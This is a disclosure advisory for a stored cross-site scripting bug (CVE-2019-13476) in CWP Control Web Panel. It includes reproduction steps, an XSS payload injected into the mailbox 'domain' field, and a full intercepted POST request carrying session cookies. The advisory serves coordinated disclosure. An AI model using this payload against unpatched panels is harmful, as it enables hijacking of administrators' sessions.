Share
# ====================================================================  
# Information  
# ====================================================================  
  
Product : CWP Control Web Panel  
version : 0.9.8.837  
Fixed on : 0.9.8.851  
Test on : CentOS 7.6.1810 (Core)  
Reference : https://control-webpanel.com/  
CVE-Number : 2019-13476  
  
  
# ====================================================================  
# Description  
# ====================================================================  
Cross Site Scripting (Stored) User add "New Mailbox" with payload XSS without validation   
  
  
# ====================================================================  
# Steps to Reproduce  
# ====================================================================  
1. In user panel click at "Email Account" under the Email Accounts and click it again  
2. Add a "New Mailbox"  
3. Use BurpSuite for Intercept request then modified parameter "domain" to payloads XSS ('-confirm(document.cookie)-'@blahblah.com)  
4. We can added email success the parameter "domain" without input validate  
5. In the List of mailbox user it's not exist after add email with xss payload, but in the admin panel added success  
6. In the panel admin Click Email --> Email Accounts we can see the xss payload  
7. Click any the button such as Change Password, Suspend, Delete XSS payload will be Executed  
  
  
  
POST /cwp_df6968dca257be58/test/test/index.php?module=email_accounts&acc=addemail HTTP/1.1  
Host: 172.16.10.141:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: d6209a4f4bd1bf71b6987849c240bfa1  
X-Requested-With: XMLHttpRequest  
Content-Length: 48  
Connection: close  
Referer: https://172.16.10.141:2083/cwp_df6968dca257be58/test/?module=email_accounts  
Cookie: cwpsrv-bcb237cdd1001e9602820eb23df41980=jemq3j57diag45omlam2ffkkl5; cwpsrv-User-bcb237cdd1001e9602820eb23df41980=d3m5mauq3rl87m4nnpsfdhhr66; CWP-User=%7B%22user%22%3A%22test%22%2C%22date%22%3A%2219-08-20+09%3A28%3A26%22%2C%22token%22%3A%224003752352ba866c06a4e32dbcc7b9df6471613b%22%2C%22tokenuser%22%3A%225c434cc8bd14b6b500dccaae8b35389e%3AhtBkFA%3D%3D%22%2C%22timer%22%3A%2237f00cb4e1f28dc383d3ac9364129600%22%2C%22pwd%22%3A%22s%2BsKQWei%5Cn%22%7D  
  
email=test&domain='-confirm(document.cookie)-'@blahblah.com&pass=3937a279&quotamail=0  
  
  
# ====================================================================  
# PoC  
# ====================================================================  
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13476.md  
  
  
# ====================================================================  
# Timeline  
# ====================================================================  
2019-06-05: Discovered the bug  
2019-06-05: Reported to vendor  
2019-06-05: Vender accepted the vulnerability  
2019-07-17: The vulnerability has been fixed  
2019-08-20: Published  
  
  
# ====================================================================  
# Discovered by  
# ====================================================================  
Pongtorn Angsuchotmetee  
Nissana Sirijirakal  
Narin Boonwasanarak